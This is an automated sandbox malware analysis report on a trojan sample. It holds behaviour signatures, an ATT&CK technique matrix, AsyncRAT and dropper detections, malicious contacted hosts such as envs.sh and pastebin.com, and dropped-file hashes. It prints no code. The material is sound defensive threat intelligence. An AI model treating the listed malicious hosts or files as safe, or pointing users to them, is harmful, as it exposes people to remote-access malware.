Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | File created: | Jump to dropped file |
Source: | File source: | ||
Source: | File source: |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Exploitation for Client Execution | 1 BITS Jobs | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 131 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 51 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 BITS Jobs | NTDS | 51 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Process Injection | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Software Packing | DCSync | 23 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
68% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT | ||
57% | Virustotal | Browse | ||
100% | Avira | TR/Dropper.Gen | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira | TR/Redcap.oczed | ||
100% | Joe Sandbox ML | |||
75% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
2% | Virustotal | Browse | ||
11% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
1% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | phishing | ||
0% | Avira URL Cloud | safe | ||
12% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
2% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | phishing | ||
2% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | phishing | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
9% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
100% | Avira URL Cloud | phishing | ||
0% | Virustotal | Browse | ||
100% | Avira URL Cloud | phishing | ||
11% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | phishing | ||
12% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Virustotal | Browse | ||
100% | Avira URL Cloud | phishing | ||
9% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
envs.sh | 89.163.145.170 | true | true |
| unknown |
getsolara.dev | 104.21.93.27 | true | false |
| unknown |
www.nodejs.org | 104.20.23.46 | true | false |
| unknown |
edge-term4-lhr2.roblox.com | 128.116.119.3 | true | false |
| unknown |
pastebin.com | 104.20.4.235 | true | true |
| unknown |
clientsettings.roblox.com | unknown | unknown | true |
| unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
false |
| unknown | |
true |
| unknown | |
true |
| unknown | |
false |
| unknown | |
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true | |
128.116.119.3 | edge-term4-lhr2.roblox.com | United States | 22697 | ROBLOX-PRODUCTIONUS | false | |
89.163.145.170 | envs.sh | Germany | 24961 | MYLOC-ASIPBackboneofmyLocmanagedITAGDE | true | |
104.21.93.27 | getsolara.dev | United States | 13335 | CLOUDFLARENETUS | false | |
104.20.23.46 | www.nodejs.org | United States | 13335 | CLOUDFLARENETUS | false |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1511791 |
Start date and time: | 2024-09-16 12:21:09 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 1s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe |
Detection: | MAL |
Classification: | mal100.troj.evad.winEXE@11/14@5/6 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 52.168.117.173
- Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target BootstrapperV1.19.exe, PID 6516 because it is empty
- Execution Graph export aborted for target SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, PID 7144 because it is empty
- Execution Graph export aborted for target bitsadmin.exe, PID 3744 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtAllocateVirtualMemory calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description |
---|---|---|
06:22:22 | API Interceptor | |
06:22:23 | API Interceptor | |
06:22:45 | API Interceptor | |
06:24:18 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
104.20.4.235 | Get hash | malicious | Remcos | Browse |
| |
Get hash | malicious | WSHRAT | Browse |
| ||
Get hash | malicious | WSHRAT | Browse |
| ||
Get hash | malicious | WSHRAT | Browse |
| ||
Get hash | malicious | WSHRAT | Browse |
| ||
Get hash | malicious | WSHRAT | Browse |
| ||
128.116.119.3 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | DCRat | Browse | |||
104.21.93.27 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
104.20.23.46 | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | XWorm | Browse | |||
Get hash | malicious | PureLog Stealer, XWorm, zgRAT | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
www.nodejs.org | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
| |
Get hash | malicious | AsyncRAT, XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
| ||
pastebin.com | Get hash | malicious | AsyncRAT | Browse |
| |
Get hash | malicious | AsyncRAT, XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | AsyncRAT, StormKitty, WorldWind Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
getsolara.dev | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
| |
Get hash | malicious | AsyncRAT, XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
edge-term4-lhr2.roblox.com | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
ROBLOX-PRODUCTIONUS | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
| |
Get hash | malicious | AsyncRAT, XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
MYLOC-ASIPBackboneofmyLocmanagedITAGDE | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | PureLog Stealer | Browse |
| ||
Get hash | malicious | Phisher | Browse |
| ||
Get hash | malicious | Phisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | Azorult, GuLoader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | K4spreader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AsyncRAT | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | Azorult, GuLoader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | K4spreader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AsyncRAT | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
28a2c9bd18a11de089ef85a160da29e4 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | AsyncRAT | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AsyncRAT, XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 1.3234442710382834 |
Encrypted: | false |
SSDEEP: | 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvro:KooCEYhgYEL0In |
MD5: | 2BB9D268C96C8367219117E7462E48A9 |
SHA1: | 9AAA1B2A27E8E0FC98B54BD35FD1797EAC00ED89 |
SHA-256: | 54C1AD4ADA0FEEDB3B4090673189C8CFCED280DD5B3F4EB903A971ED9818B271 |
SHA-512: | 36830FCD3E7A92A0EB92739C86826C078B0786F19194E3B7632D81ED4E39F82458D66BB73C27E2680B4A1D297756A2AF2A632EF02DFA971599E2840B8F689569 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.42215743714096754 |
Encrypted: | false |
SSDEEP: | 1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO |
MD5: | 8178096ACF9C13ED2DC1D6CA8C7FA4A0 |
SHA1: | C9745FDF400AD10F7A961B71A91BBB0CC2A4F952 |
SHA-256: | 8594CB32C4EB6A1A83C751719CEA8729177F8BCA9AF8C1EA631A5762881F5DCE |
SHA-512: | 5DEC009A7A972F41AF693F2348C585E85B467FACD415F3FD23ECBBEDA99268F9004888E1A6AF34859B0A25DCB468D9DC409D074BCDD68D59B00E995942839B27 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07702863859174698 |
Encrypted: | false |
SSDEEP: | 3:8ll8YeEP+05ejjn13a/24D1Zl/illcVO/lnlZMxZNQl:c8zN0Aj53q2LOewk |
MD5: | 90C168266C16C675CAEE004A1965CF03 |
SHA1: | A75F623CC0CA5572F35018C0FA49B912441FE68A |
SHA-256: | 12CC1A4F141055A43901037439AACA7A06AF0E1E7B4D57C32F307483E5DDF38C |
SHA-512: | 424C67376BBC3E4095C068B05C25C1467E11F3A749551950C9A1A090FEC8C9CB111508282CCED93B6BA2E19A67C22AA89FA195CB98A7E0FBEA111BD4F46E8694 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BootstrapperV1.1_acfe46f69353e7873b32e3e17f3d3a8ab076eb_d2093ef2_c2c7818f-367b-488c-a5c1-1dea1ec5c425\Report.wer
Download File
Process: | C:\Windows\System32\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.2316132178446182 |
Encrypted: | false |
